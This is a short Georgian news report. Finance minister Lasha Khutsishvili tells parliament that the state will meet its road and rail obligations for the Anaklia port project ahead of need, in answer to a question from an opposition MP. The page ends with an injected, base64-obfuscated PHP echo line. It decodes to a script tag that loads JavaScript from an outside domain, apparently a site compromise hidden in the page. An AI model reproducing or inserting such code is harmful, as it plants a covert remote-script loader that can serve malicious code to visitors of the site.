celsiusi
ავერსი საქკაბელი
ფინანსთა მინისტრი ლაშა ხუციშვილი აცხადებს, რომ ანაკლიის პორტთან დაკავშირებით სახელმწიფოს მხრიდან ვალდებულებები იმაზე ადრე შესრულდება, ვიდრე პროექტით ამის საჭიროება დადგება.
 
ამის შესახებ მან დღეს, 17 თებერვალს, პარლამენტში, მინისტრის საათის ფორმატში მოსმენისას განაცხადა.
 
ხუციშვილს ენმ-ის წევრმა ანი წითლიძემ ჰკითხა, თუ რას უპირებდა მთავრობა ანაკლიის პორტს.
 
„სსიპ-ი, რომელიც შექმნილია ამ მიმართულებით და მიმდინარე წელს ხარჯავს თანხას, ბუნებრივია, ეს თანხა იხარჯება აღნიშნული სსიპ-ის მიერ იმისთვის, რომ მოხდეს ახალი პირობებით ტენდერის გამოცხადება, მოხდეს შესაბამისი სამუშაოების დაფინანსება. ამ შემთხვევაში საუბარია მოსამზადებელ სამუშაოებზე იმისთვის, რომ მოხდეს აღნიშნული ტენდერის გამოცხადება.
 
რაც შეეხება გზის და რკინიგზის მიყვანას, სრულ პასუხისმგებლობას ვიღებთ, რომ როგორც კი პროექტი საწყის ეტაპზე იქნება, აღნიშნული თანხები იქნება მოძიებული და მიმართული იმისკენ, რომ პროექტის განხორციელების პარალელურად, აღნიშნული ვალდებულებები სახელმწიფოს მიერ შესრულდეს. ამ ნაწილში ვერანაირ პრობლემას ვერ ვხედავ, პირიქით, სახელმწიფოს მხრიდან ვალდებულებები იმაზე ადრე შესრულდება, ვიდრე პროექტით ამის საჭიროება დადგება“, – განაცხადა ლაშა ხუციშვილმა.
882
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");